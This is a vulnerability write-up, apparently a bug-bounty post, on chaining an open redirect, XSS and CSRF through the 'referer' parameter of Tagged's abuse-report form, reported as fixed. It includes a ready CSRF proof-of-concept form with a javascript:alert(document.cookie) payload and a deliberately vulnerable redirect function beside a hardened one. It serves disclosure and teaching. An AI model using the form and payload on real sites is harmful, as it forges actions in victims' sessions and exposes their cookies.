XSS + CSRF attack in Tagged using the redirect parameter (open URL redirection also possible)

Hi guys,

Today I want to show you how you can combine an XSS and a CSRF attack. This is very interesting, but pretty difficult to find and to build a PoC for.

Bug type : XSS+CSRF
Bug category : XSS,CSRF
OWASP links :
1.https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
2.https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Description : In Tagged you can report any user for spam/abuse. The HTTP POST request that submits the report contains a hidden parameter called "referer". After the report is submitted, the site redirects the browser to whatever URL this parameter holds, so the same parameter can also be used to send the victim to an arbitrary external website (open URL redirection).
The redirect is performed client-side in JavaScript. When "referer" holds a normal URL, the browser is sent to that URL, but when it holds javascript:alert(1) the browser executes the JavaScript instead of navigating, which turns the open redirect into an XSS.
Attack steps :
1. Create a CSRF PoC page whose "referer" field carries the XSS payload javascript:alert(1).
2. Submit the form (click the button): the report is sent in the victim's session and the XSS pop-up appears.
3. Alternatively, put any URL in "referer" to redirect the victim to a malicious website.

XSS payload used : javascript:alert(document.cookie) in the "referer" parameter

Proxy tool used : Burp Suite

HTML code for the CSRF PoC :

<html>
<body>
<!-- Cross-site form: the victim's browser sends its Tagged session cookie with this POST -->
<form action="http://m.tagged.com/report_abuse.html" method="POST">
<input type="hidden" name="report_userId" value="6025854846">
<!-- redirect target after the report is filed; a javascript: URL executes instead of navigating -->
<input type="hidden" name="referer" value="javascript:alert(document.cookie)">
<input type="hidden" name="contentId" value="1436985861035340">
<input type="hidden" name="reason" value="threads">
<input type="submit">
</form>
</body>
</html>
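For contrast, the following JavaScript is an added example and not Tagged's code: it models the vulnerable client-side redirect described above (a "referer" value written straight into location) next to a hardened replacement that only accepts same-origin paths. The handler shape, the function names and the "/home" fallback page are assumptions made for the illustration.

```javascript
// Added example, not Tagged's code. Models the post-report redirect described
// in the write-up and a hardened version of it. The handler shape, the function
// names and the "/home" fallback page are assumptions for illustration.

// Vulnerable pattern (assumed shape of the original handler): the "referer"
// form field is assigned to location without any validation, so
// "javascript:alert(1)" runs as script and "http://evil.example" becomes an
// open redirect. `win` is the window object (passed in so it can be faked).
function vulnerableRedirect(referer, win) {
  win.location.href = referer; // no validation at all
}

// Hardened replacement: resolve the candidate against the site origin and
// accept it only if it still points at that origin. javascript:, data:,
// protocol-relative "//host" URLs, "/\host" (backslash is an authority
// separator for http(s) in WHATWG URL parsing) and absolute URLs to other
// origins all resolve elsewhere and fall back to a fixed landing page.
function safeRedirectTarget(candidate, origin, fallback = "/home") {
  if (typeof candidate !== "string") return fallback;
  const trimmed = candidate.trim();
  if (trimmed === "") return fallback;

  let url;
  try {
    // The URL parser lower-cases the scheme and strips stray whitespace,
    // so "JavaScript:alert(1)" still ends up with protocol "javascript:".
    url = new URL(trimmed, origin);
  } catch {
    return fallback; // unparseable input is never a valid destination
  }

  // Non-http(s) schemes report origin "null"; other hosts report their own
  // origin. Only an exact match with the site origin is accepted.
  if (url.origin !== new URL(origin).origin) return fallback;

  // Return only path + query + fragment: the scheme and host are always ours.
  return url.pathname + url.search + url.hash;
}

// Hardened handler: same call site as the vulnerable one, validated target.
function safeRedirect(referer, win, origin) {
  win.location.href = safeRedirectTarget(referer, origin);
}

module.exports = { vulnerableRedirect, safeRedirectTarget, safeRedirect };
```

The hardened function closes the cases an attacker reaches for: the javascript: scheme in any letter case or with leading whitespace, protocol-relative //host URLs, a backslash after the leading slash, and absolute URLs to other origins, as well as a downgrade from https to http on the same host (a different origin). It only fixes the redirect sink, though; the report itself remains forgeable cross-site until the POST carries an anti-CSRF token (or the session cookie is SameSite), which is the other half of this bug.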


Video PoC :


Status : Fixed

